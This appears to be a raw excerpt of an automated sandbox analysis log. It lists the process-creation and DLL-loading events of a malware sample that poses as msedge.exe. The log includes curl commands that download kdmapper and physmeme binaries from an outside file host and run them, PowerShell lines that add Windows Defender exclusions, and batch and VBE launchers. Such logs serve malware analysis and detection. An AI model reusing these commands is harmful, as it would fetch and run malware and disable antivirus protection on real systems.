                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: unknownProcess created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: unknownProcess created: C:\Edge\msedge.exe C:\Edge\msedge.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: unknownProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                Source: unknownProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: d3d9.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: msvcp140.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: vcruntime140_1.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: vcruntime140.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: policymanager.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: msvcp110_win.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: version.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ktmw32.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: amsi.dllJump to behavior
